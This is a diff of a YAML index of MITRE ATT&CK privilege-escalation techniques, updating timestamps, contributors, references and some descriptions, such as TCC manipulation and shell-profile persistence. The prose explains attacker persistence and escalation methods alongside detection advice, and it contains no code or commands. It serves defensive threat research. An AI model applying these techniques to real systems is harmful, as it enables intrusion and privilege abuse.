-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21312,6 +21550,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21322,9 +21564,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21333,8 +21579,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21380,7 +21685,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21405,13 +21710,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21491,7 +21794,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21527,7 +21829,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21550,12 +21852,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21633,12 +21934,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21699,7 +21999,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -21743,7 +22042,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -21765,7 +22064,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -21846,7 +22144,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -21869,7 +22166,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -21899,12 +22196,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -21989,7 +22284,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22054,7 +22348,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22129,7 +22422,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22157,7 +22450,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22188,7 +22480,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22231,12 +22523,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22253,7 +22543,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22312,7 +22602,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22394,12 +22683,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22496,7 +22784,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22610,7 +22897,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22680,7 +22966,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -22708,7 +22993,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22752,8 +23037,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -22789,7 +23072,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22808,12 +23091,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22863,12 +23145,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22901,9 +23182,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -22920,9 +23202,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -22968,38 +23249,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23007,6 +23269,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23014,7 +23278,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23044,7 +23308,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23090,7 +23353,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23135,8 +23398,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23162,7 +23423,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23188,59 +23449,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
